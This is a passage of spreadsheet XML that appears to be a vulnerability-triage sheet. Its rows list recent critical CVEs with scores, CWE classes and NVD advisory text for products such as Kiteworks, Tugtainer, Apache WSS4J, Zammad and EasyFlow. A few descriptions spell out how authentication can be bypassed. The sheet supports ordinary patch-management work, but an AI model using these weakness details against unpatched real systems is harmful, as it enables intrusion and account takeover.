      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core did not correctly validate a parameter submitted to the password reset workflow. An unauthenticated attacker who knew the email address of a user with a locally stored password could potentially reset that account's password without access to the emailed reset link and then authenticate as that user, including where the account holds administrative privileges.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102115</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18782</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Command Line Execution through SQL Injection.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18782</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55494</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.4, Tugtainer Agent allows unauthenticated access to Docker management APIs when AGENT_SECRET is not configured. The Agent uses request signatures to protect its API routes. However, in agent/auth.py, the signature verification function returns successfully if Config.AGENT_SECRET is empty. This causes protected Agent APIs to become accessible without authentication. This issue has been patched in version 1.30.4.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55494</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82307</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Dolusoft Software Technologies SOPLOG allows SQL Injection.
This issue affects SOPLOG: before Soplog 2026.9.4.1.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82307</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88920</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in the DOM security processor in Apache WSS4J allows unauthenticated remote attackers to forge authenticated SOAP messages via a crafted unsigned SAML sender-vouches assertion containing an attacker-controlled key.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88920</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96350</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96350</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97248</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Booking Activities &lt;= 1.18.7.1 versions.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97248</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97274</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Bypass Vulnerability in OAuth Single Sign On – SSO (OAuth Client) &lt;= 7.1.2 versions.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97274</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102149</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently restrict which account a certificate could be assigned to. This could allow an attacker to associate a certificate with another user's account, affecting the confidentiality and integrity of that account's encrypted mail and, where certificate-based login is enabled, potentially permitting unauthorized access to the account.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102149</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102489</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Zammad versions 6.3.0 to 6.5.4 are vulnerable a session hijack vulnerability that leads to remote code execution as the zammad user. The vulnerability is also present in version 7.0.0 to version 7.1.3, but not exploitable due to environment conditions.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102489</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102490</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>csirt@divd.nl</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>All versions of Zammad including the latest alpha enable the local zammad user to escalate privileges to root.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102490</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14157</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Use of an Externally Controlled Format String in the ASUS Router modules allow a remote authenticated user to execute arbitrary commands via a crafted file uploaded through the web management interface.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14157</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55181</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.3, Tugtainer's OIDC authentication can still be initiated even when OIDC_ENABLED=false. The /auth/oidc/enabled endpoint correctly reports that OIDC is disabled. However, a direct request to /auth/oidc/login still starts the OIDC login flow, returns HTTP 302, sets an oidc_state cookie, and redirects the user to the configured OIDC authorization endpoint. This bypasses the intended OIDC disable switch. This issue has been patched in version 1.30.3.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55181</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93903</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-174</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>LiteSpeed Web Server (LSWS) before 6.3.7 build 1 mishandles internal redirect URL validation in a certain "corner case."</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93903</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102147</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an unauthenticated attacker to store crafted content that later executes arbitrary JavaScript in the authenticated session of an administrator who views the affected page. This could have permitted the attacker to gain full administrative control, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102147</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102455</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Insecure Deserialization vulnerability. Unauthenticated remote attackers can execute arbitrary code on the server by sending maliciously crafted serialized content.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102455</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102458</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has a Missing Authentication vulnerability. Unauthenticated remote attackers can obtain other users' plaintext passwords through a specific API.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102458</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103395</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
